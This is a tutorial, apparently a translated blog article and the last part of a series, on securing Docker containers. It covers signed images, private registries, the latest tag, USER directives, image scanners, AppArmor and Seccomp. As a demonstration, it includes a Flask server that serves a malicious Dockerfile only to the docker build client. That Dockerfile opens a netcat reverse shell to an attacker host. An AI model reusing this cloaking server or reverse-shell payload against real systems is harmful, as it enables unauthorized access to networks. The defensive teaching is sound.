Docker Security – Container Security (Part 5)

19 May 2024 23 minutes Author: D2-R2

This is the fifth and final part of the Docker security article. In this installment, we’ll focus on securing Docker containers, looking at best practices and tools to protect your containers from vulnerabilities and attacks. Learn how to effectively use existing security tools to keep your containerized applications stable and secure.

Security of containers

Now it’s time to discuss some basic, but also complex, issues related to container security and configuration. Let’s start with something really basic.

Choosing the right image

Using official or trusted Docker images is critical to keeping your applications and data secure. Official images are checked for quality and security, which minimizes the risk of malware content or security vulnerabilities. Reputable companies regularly update their images to fix known bugs and security gaps. As a result, systems are protected from the latest threats.

Unlike trusted images, unverified Docker images can contain dangerous or malicious software. There is no guarantee that they have been properly tested and approved for safety. By using such images, users expose their systems to various types of attacks, including ransomware attacks that can encrypt data and demand a ransom to decrypt it, as well as man-in-the-middle attacks that involve intercepting and manipulating communications between two parties.

How to check if an image is “official”? When using DockerHub, we get graphical information about whether the selected image is official, that is, published and verified by the Docker team.

Figure 78. Docker Official Image icon in Docker Hub.

Why is choosing a protected image so important? There have been, and no doubt will be, situations where Docker images have been used as a distribution channel for malware. Examples of such situations can be found at the links below:

In short, what elements did these malicious images contain? These include, but are not limited to, cryptocurrency miners or software that steals credentials, such as from environment variables. Other examples include using a container launched from a malicious image as a kind of Trojan horse, allowing an attacker to gain unauthorized access to our internal network.

Docker Content Trust (DCT)

Docker Content Trust (DCT) is a security feature in Docker that allows you to verify the integrity and provenance of Docker images. DCT uses digital signatures to ensure that the Docker images you use have not been modified since they were created. In other words, it helps the process of verifying the authenticity and integrity of images.

By default, DCT is inactive. To enable this mechanism, we must set the DOCKER_CONTENT_TRUST environment variable to 1 in the Docker host configuration. If we want DCT to be active all the time, we should define this environment variable in files like .bashrc, .zshrc, or whatever is appropriate for the shell we are using.

From now on, the Docker CLI commands are:

  • push,

  • build,

  • create,

  • pull,

  • run,

will use DCT. What does this mean in practice? If we try to pull an image from a selected repository using the docker pull command (for example, from Docker Hub), this operation will only succeed if the selected image is signed. Let’s check it with an example (Fig. 79, Listing 50).

export DOCKER_CONTENT_TRUST=1
env | grep DOCKER
docker pull ubuntu:23.04
docker pull ubuntubase/debianbase:12

Listing 50. Checking the operation of the DCT.

Figure 79. DCT configuration.

At the first step, we download the official signed image of Ubuntu with the tag 23.04. Everything worked flawlessly. Then we chose an image from the repository that didn’t seem reliable and tried to download it. The Docker client returned an error telling me that it couldn’t find the signature for that particular image. This is a step in the right direction!

Of course, it’s important to remember that in some cases, not being able to download an unsigned image may be undesirable for us. But we are talking about hardening!

Of course, Docker Content Trust also works when we want to sign an image that we publish. Detailed instructions on how to set up the client so we can sign images can be found at this link.

Use of own images

Instead of relying entirely on the public Docker Hub, it’s much better to use your own image repository. Of course, we can use ready-made solutions such as Azure Container Registry or Google Artifact Registry, but we can also easily set up our own repository.

Running your own image repository for testing purposes is a matter of just a few commands. According to Docker, we launch the repository from an image (Listing 51).

docker run -d -p 5000:5000 --restart=always --name registry registry:2

Listing 51. Starting the local registry.

And that’s all. We have an image repository running, albeit in a very basic configuration, which for example does not require any form of authentication (Figure 80).

Figure 80. Launching Docker Registry.

Perfectly! We already have our own repository where we can store the created images. This way they will be isolated from, for example, Docker Hub.

The approach of using our own private storage (not necessarily hosted on our own infrastructure, but over which we have control) also has the advantage that we can constantly monitor the security of the images and respond to any identified potential threats.

WARNING! The current Docker registry configuration provides little to no authentication. Therefore, we cannot use it in a production environment. However, by default, there are several ways to force authentication. More information on this topic can be found in the documentation.

Docker build and URL

You should avoid builds that assume the Dockerfile is being pulled from a remote resource over which you have no control. For example, you can start the image creation process with the following command from Listing 52.

docker build http://random-server/Dockerfile

Listing 52. Example of running docker build from a URL.

Unfortunately, a person controlling any server can drop us a malicious Docker file, even if everything looks fine. Let’s check it with an example. A simple Python program using the Flask framework (Listing 53).

from flask import Flask, request
app = Flask(__name__)

@app.route('/Dockerfile', methods=['GET'])
def headers():
    headers = request.headers
    if "Go-http-client" in headers['User-Agent']:
      response = open('EvilDockerfile').read()
    else:
      response = open('Dockerfile').read()
    return response

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port=5001)

Listing 53. An example program based on Python3 and Flask.

His task is very simple. If we make a request to the /Dockerfile endpoint, for example, using a standard browser such as Chrome or Firefox (or even the curl command), the program will return the contents of the Dockerfile located on the server’s disk. However, if a header containing the string Go-http-client appears in the User-Agent request, the contents of a different file, namely EvilDockerfile, will be returned. Let’s see how these files differ (Listing 54, Listing 55).

FROM ubuntu:22.04
RUN useradd -r testuser
USER testuser

Listing 54. Dockerfile.

FROM ubuntu:22.04
RUN apt-get update && apt-get install -y netcat-traditional
CMD ["/usr/bin/nc.traditional", "172.16.169.186", "4444", "-e", "/bin/sh"

Listing 55. EvilDockerfile.

The first Dockerfile seems harmless. However, the second contains instructions that create what is known as a “back shell”. Anyone who creates a container based on this Dockerfile (especially the EvilDockerfile) and then runs it allows an attacker to gain access to the container. This, in turn, means access to the internal network from which the attacker can continue his activities.

Now let’s try running the app and see how it works in practice. If you haven’t installed Flask before, you can do so by running apt install python3-flask. Also, on the server with the address 172.16.169.186, in the third console we will log in and run netcat in listening mode. Pending callback connection from malicious container (nc -nlvp 4444).

In one console we will run the application (using the python3 app.py command) and in the other we will try to download the file from the endpoint provided by the application (using the curl http://172.16.169.183:5001/Dockerfile command).

Figure 81. Dockerfile download

As you can see, the first attempt to download the Dockerfile returns a “harmless” version. We can achieve the same effect by visiting the specified address from any web browser. Now let’s try to send a request to the endpoint with a User-Agent header value identical to the one used by the docker build tool (Figure 82).

Figure 82. Downloading a malicious version of the Dockerfile.

Our app seems to be working correctly. It’s time for the final test. Let’s run docker build (Figure 83)

Figure 83. Starting the Docker build.

Once the process is complete, we can try to run the container based on the created image (Figure 84).

Figure 84. Launching the malicious container and establishing a reverse shell session.

Boom! As soon as we launched the image on our remote server, the connection was established! We now have control over the container.

The example we will present involves work in an internal network. However, nothing prevents us from using the IP address of any machine on the Internet (with a public IP address) as the server address to which the shell’s reverse connection should be established.

The last tag.

All images in a Docker environment must have their own tag. If we don’t specify which tag we want to use, Docker will default to the latest tag. However, this is a practice that can have consequences, especially from a security perspective. In practice, it is worth checking how the tag works and what it is. To do this, we will use the image repository that we created a moment ago.

A common mistake that results from misunderstanding the latest tag is to assume (from its name) that latest indicates the latest version of the software. For example, in an Ubuntu repository containing 23.04 and 22.04 images, the latest is often assumed to point to the former. That may be true, but it doesn’t have to be. Under certain conditions, it can be different.

We will run an experiment that involves adding two Docker images to the repository, namely ubuntu:23.04 and ubuntu:22.04. These images are already on the disk (Fig. 85).

Figure 85. Images stored on the local disk.

Time for the actual exercise (Listing 56).

docker tag ubuntu:23.04 localhost:5000/ubuntu
docker push localhost:5000/ubuntu:23.04

docker tag ubuntu:22.04 localhost:5000/ubuntu
docker push localhost:5000/ubuntu:22.04
docker tag ubuntu:22.04 localhost:5000/ubuntu
docker push localhost:5000/ubuntu:latest

Listing 56. Tagging local images and sending them to local storage.

Figure 86. Tagging and sending images to the registry.
Figure 87. Tagging and sending images to the registry.

Let’s now try to download the image from the Docker repository.

Figure 88. Removing the “last” image from storage.

As you can see (Figure 88), the downloaded image (the last position in the highlighted box) is version 22.04, not the “latest” version available in the repository, which is 23.04.

Remember that latest is another tag. This may indicate the latest version of the software, but it doesn’t have to. The final decision on this matter is entirely up to the person adding the image to the repository.

In summary, avoiding latesttags in Docker helps improve the stability, consistency, and security of containerized applications. It is always recommended to use custom tags to be sure of the version of an image used in a particular environment.

The latest Docker tag refers to the most recent image added to the repository, not necessarily the latest version of the software. This means that if someone pushes an older version of software to a Docker repository and tags it as latest, users who download images with the latest tag will get that older version instead of the latest version of the software.

Avoid using the latest tag.

USER command

By default, operations defined in the Dockerfile are executed as root (with root permissions). Using the USER directive in the Dockerfile allows you to change this behavior by limiting the privileges of processes running in the container, which is beneficial from a security perspective. For example, if you have an application that does not require root privileges to function properly, you can use the USER statement to change the user to a less privileged one. This practice can help protect the system from potential attacks.

Let’s try to create our own example a Dockerfile in which we will use the USER directive (Listing 57).

FROM ubuntu:22.04
RUN useradd -r testuser
USER testuser

Listing 57. An example of a Docker file using the USER statement.

WARNING! It is not recommended to specify the UID explicitly (eg with the -u 1001 switch). This can cause problems with container operations and applications running on it, especially when running an image on the Openshift platform, for example.

Running the image requires several commands (Listing 58, Figure 89).

# Commands to be executed in the context of the Docker Host
docker build -t ubuntu-testuser .
docker run -it --rm ubuntu-testuser bash

# Commands to be executed in the context of container
id
head -n 1 /etc/shadow

Listing 58. Starting a new container.

Figure 89. Starting the container from the created image.

All is well. By default, we work with testuser, which has limited permissions! This is definitely a practice to remember.

Forced UID

Unfortunately, the solution described above can be easily bypassed. You just need to add the -u 0 option when starting the container, which will allow us to go back to running as root (Listing 59, Figure 90).

docker run -it --rm -u 0 ubuntu-testuser bash

Listing 59. Starting a container with the -u 0 option.

Figure 90. Access to the container with the privileges of the root user.

This question will be considered in the part of the article dedicated to AppArmor.

.Dockerignore

We had several cases of building our own image. At this point, it’s worth discussing practices that are often seen in guides to “dockerization” (containerization) of applications. It usually discusses standard instructions such as FROM, WORKDIR, or even the previously introduced command . USERHowever, at a certain stage, a method of transferring program files to an image (into a container) is presented. In many cases, the structure from listing 60 was observed.

COPY . .

Listing 60. Example of the COPY command.

The COPY command. .copies all files and directories from the directory where the Dockerfile is located to the image. The first argument (.) means “all files and directories in the current directory” and the second argument (.) means “the working directory in the Docker image”. Here it is important to pay attention to the phrase “all files and directories” – and it means literally all. Even files that shouldn’t be pushed into the image, such as files like .cache or node_modules, or files that shouldn’t be there because of their content, are also pushed. For example, these may be files containing credentials or other sensitive data. How can we solve this problem?

The .dockerignore file is used to exclude files and directories from the Docker image creation process. A .dockerignore file works similarly to a .gitignore file in the Git version control system. It allows you to specify templates that will be excluded from the image being built.

A sample .dockerignore file might look like Listing 61.

# ignore node_modules folder
node_modules/

# ignore test folder
/test

# ignore files .gitignore and .env
.gitignore
.env

# ignore all markdown files
*.md

Listing 61. Sample .dockerignore.

We need to place it in the same directory as our Dockerfile.

Automatic image scanning

In the previous part of the text, we got acquainted with tools such as Lynis or Docker Bench for Security, which allowed us to automate the security level check of Docker Host and Docker Daemon. However, when it comes to Docker security, we can’t forget about the security of the images themselves. Fortunately, there are already ready-made tools in this area, with the help of which we can automate the process of vulnerability analysis. One of them is Trivi.

Trivy

Trivy is a tool that can automatically scan the following resources for security vulnerabilities:

  • Images of containers,

  • file systems,

  • Git repositories,

  • Image of virtual machines,

  • Kubernetes clusters,

  • AWS environments.

We can download and run Trivy as a container (Listing 62).

docker pull aquasec/trivy:0.45.1

Listing 62. Loading a Trivy image.

To run a scan of the selected image, in this case ubuntu:22.04, enter the following command from Listing 63 (Figure 91):

docker run -v /var/run/docker.sock:/var/run/docker.sock aquasec/trivy:0.45.1 image ubuntu:22.04

Listing 63. Running a Trivy scan.

Figure 91. Starting a scan with Trivy.

After a few seconds, Trivy returns the result in the form of a table with a list of detected anomalies (Figure 92).

Figure 92. Trivy scan result – a table with a list of vulnerabilities.

For our ubuntu:22.04 test image, we identified two high-risk vulnerabilities, six medium-risk vulnerabilities, and fifteen issues classified as low-risk threats.

Each vulnerability is accompanied by a link, such as https://avd.aquasec.com/nvd/cve-2022-3715, where details about the vulnerability can be found. Importantly, mitigation recommendations are also provided.

Docker Scout

The Docker Scout tool is definitely worth considering as well. This advanced tool can scan images and provide recommendations on actions to take to eliminate selected threats.

Docker Scout can be managed through the console, but it also has a user-friendly graphical user interface. This interface can be managed from Docker Desktop by going to the Images tab. Then we select the image we are interested in and finally click on the Vulnerabilities tab.

For example, by downloading an older version of the Ubuntu image using the command docker pull ubuntu:groovy-20200609. After a few seconds, Scout suggested the vulnerabilities found in this image (Figure 93).

Figure 93. Docker Scout results.

A similar effect can be achieved by issuing the docker scout cves ubuntu:groovy-20200609 command from the console (Figure 94).

Figure 94. Launching Docker Scout from the console.

Other tools that we recommend for your attention:

  • clair – https://github.com/quay/clair

  • InSpect – https://docs.chef.io/inspec/

  • notary – https://github.com/notaryproject/notary

  • snyk – https://snyk.io/partners/docker/

Remember that you should not completely rely on automatic solutions. Manual security checks can also produce interesting results. It is especially important to note that there are ways to “hide” from scanners.

AppArmor

AppArmor (Application Armor) is a security tool used to restrict the capabilities of applications and processes. This helps prevent attacks and successful attempts to exploit vulnerabilities. AppArmor allows the operating system to restrict the actions of a particular application – what it can do, what resources it can use, and what files or directories it can read or write to.

AppArmor is often used to strengthen the security of Docker containers. When a container is launched, it can be assigned an AppArmor profile. This profile defines a set of rules and restrictions that determine which operations are allowed and which are not allowed for processes running in the container.

AppArmor is an example of a mandatory access control (MAC) mechanism on a Linux system. Although Linux typically relies on a discretionary access control (DAC) model, tools like AppArmor allow you to enforce additional, more detailed, and strict security rules that cannot be changed by normal users. SELinux is another example of a mechanism based on the MAC concept.

You may not have even heard of AppArmor before, but Docker uses AppArmor’s default policy by default. This means that when the docker-default container is started, the profile is loaded.

We’ll try to prepare and then modify an example AppArmor policy based on the example provided by Docker for the nginx server (Listing 64). An example can be found here.

#include <tunables/global>


profile docker-nginx flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>

  network inet tcp,
  network inet udp,
  network inet icmp,

  deny network raw,

  deny network packet,

  file,
  umount,

  deny /bin/** wl,
  deny /boot/** wl,
  deny /dev/** wl,
  deny /etc/** wl,
  deny /home/** wl,
  deny /lib/** wl,
  deny /lib64/** wl,
  deny /media/** wl,
  deny /mnt/** wl,
  deny /opt/** wl,
  deny /proc/** wl,
  deny /root/** wl,
  deny /sbin/** wl,
  deny /srv/** wl,
  deny /tmp/** wl,
  deny /sys/** wl,
  deny /usr/** wl,

  audit /** w,

  /var/run/nginx.pid w,

  /usr/sbin/nginx ix,

  deny /bin/dash mrwklx,
  deny /bin/sh mrwklx,
  deny /usr/bin/top mrwklx,


  capability chown,
  capability dac_override,
  capability setuid,
  capability setgid,
  capability net_bind_service,

  deny @{PROC}/* w,   # deny write for all files directly in /proc (not in a subdir)
  # deny write to files not in /proc/<number>/** or /proc/sys/**
  deny @{PROC}/{[^1-9],[^1-9][^0-9],[^1-9s][^0-9y][^0-9s],[^1-9][^0-9][^0-9][^0-9]*}/** w,
  deny @{PROC}/sys/[^k]** w,  # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel)
  deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w,  # deny everything except shm* in /proc/sys/kernel/
  deny @{PROC}/sysrq-trigger rwklx,
  deny @{PROC}/mem rwklx,
  deny @{PROC}/kmem rwklx,
  deny @{PROC}/kcore rwklx,

  deny mount,

  deny /sys/[^f]*/** wklx,
  deny /sys/f[^s]*/** wklx,
  deny /sys/fs/[^c]*/** wklx,
  deny /sys/fs/c[^g]*/** wklx,
  deny /sys/fs/cg[^r]*/** wklx,
  deny /sys/firmware/** rwklx,
  deny /sys/kernel/security/** rwklx,
}

Listing 64. An example of an AppArmor policy.

What is going on here? AppArmor’s policy is as follows:

  1. Allows the docker-nginx container to establish network connections using TCP, UDP protocols.

  2. Prevents network connections through a raw socket.

  3. A container has shared access to files with certain exceptions.

  4. Denies access to many system directories, including /bin, /boot, /dev, etc., to prevent unauthorized access or modification.

  5. Controls write access for all files by checking each write attempt.

  6. Allows writing to /var/run/nginx.pid.

  7. Allows /usr/sbin/nginx to execute.

  8. Blocks the ability to execute and modify /bin/dash, /bin/sh, and /usr/bin/top.

  9. Grants selected permissions to the container, such as chown, dac_override, setuid, setgid, and net_bind_service.

  10. Prevents writing to the /proc directory except for certain paths.

  11. Prevents mounting of file systems inside the container.

  12. Restricts access to directories in /sys, increasing system security against unauthorized access and modification.

Let’s see how it works in practice.

We store the policy in a file like /etc/apparmor.d/containers/docker-nginx. Then we run the program that loads the specified policy, that is, we execute the command: sudo apparmor_parser -r -W /etc/apparmor.d/containers/docker-nginx. All that’s left is to start the container (Listing 65).

docker run --security-opt "apparmor=docker-nginx" -p 80:80 -d --name apparmor-nginx nginx

Listing 65. Starting a container using an AppArmor profile.

Figure 95: AppArmor performance test.

Despite the enforced policy, nginx seems to work correctly. Now let’s make a modification that will prevent the nginx process from working with data from the /usr/share/nginx/ directory. This is the resource from which nginx serves files. We do this by adding the line from Listing 66 (Figure 96) to the file.

deny /usr/share/nginx/** rwklx,

Listing 66 A line must be added to the AppArmor policy.

Figure 96. Changing the AppArmor policy.

Time to restart the Docker container (Listing 67).

docker stop apparmor-nginx
docker rm apparmor-nginx
sudo apparmor_parser -r -W /etc/apparmor.d/containers/docker-nginx
docker run --security-opt "apparmor=docker-nginx" -p 80:80 -d --name apparmor-nginx nginx
curl http://127.0.0.1/

Listing 67. Starting a container with a changed policy.

Figure 97. Effect of AppArmor policy change.

We immediately see the difference (Fig. 97). Without making any changes to the container configuration or the Nginx server running on it, we blocked access to the /usr/share/nginx directory. Instead of displaying the contents of the index.html file, Nginx returns an access denied message. Everything is going according to plan!

It’s also worth paying special attention to situations in AppArmor where someone has disabled the security policy on a running container using a construct like –security-opt=apparmor:unconfined.

Seccomp

Seccomp, also known as Secure Computing Mode, is a tool that allows you to limit the set of system calls that a process can use. This is important from the point of view of security, as it significantly reduces the attack surface of the system. By filtering system calls and restricting access to them, Seccomp can effectively minimize the potential risks associated with exploiting security vulnerabilities in applications and operating systems.

In the context of Docker, Seccomp can be used to improve container security. By default, Docker includes a Seccomp profile that blocks several dozen of the more than 300 available system calls, thus strengthening the security of the host and containers. Users also have the ability to customize Seccomp profiles to suit their needs, allowing them to precisely control the availability of individual syscalls for specific containers. As a result, the complexity and flexibility of security controls increases, which allows you to achieve a balance between protection and application performance.

An example Seccomp policy can be downloaded from the GitHub repository. By modifying it as shown in Listing 68, we can block the ability to create new directories in a container that has this policy applied to it.

213d212
<        "mkdir",
826a826,832
>    },
>    {
>      "names": [
>        "mkdir"
>      ],
>      "action": "SCMP_ACT_ERRNO",
>      "errnoRet": 1337
829c835
< }
\ No newline at end of file
---
> }

Listing 68. The result of executing the “diff” command for the original and modified files.

After making changes to the reynard.json file, we can run the container (Figure 98, Listing 69).

wget -q https://github.com/moby/moby/raw/master/profiles/seccomp/default.json
cp default.json reynard.json
docker run -it  --security-opt seccomp=reynard.json --rm  ubuntu:22.04  bash

Listing 69. Starting the container with the new seccomp policy.

Figure 98. Changing the default Seccomp policy.

Similar to AppArmor, Docker uses the built-in Seccomp profile by default.

SELinux

In this text, we will not discuss the configuration of the SELinux mechanism, since we discussed AppArmor earlier. In theory, SELinux and AppArmor can be installed on the same system, but this is generally not recommended due to possible management complications. Typically, Linux operating systems and distributions ship with one of these security mechanisms enabled by default and the other either disabled or not installed at all.

The final piece of the puzzle is application security

Of course, this issue is beyond the scope of this article, but cybersecurity issues are a system of interconnected vessels.

Docker Desktop Security

Docker Desktop is an application for Windows and Mac operating systems. It allows users to easily manage Docker containers, including through a graphical user interface (GUI). It is a practical tool that contains all the necessary functions for building, testing and deploying containerized applications on the local computer. This is an ideal solution for those who prefer to avoid prolonged work in the console.

Docker Desktop serves as an alternative interface between the user and the Docker Daemon. Therefore, all recommendations here also apply to environments (such as development environments) that use Docker Desktop instead of Docker CLI. It is also worth emphasizing the need to regularly update Docker Desktop to the latest available version to ensure optimal performance and security.

Software updates

For the sake of formality, we will also emphasize the need for regular updates of the Docker software. Perhaps this may be what is called an obvious fact, but it allows for vulnerabilities that have been discovered and fixed.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.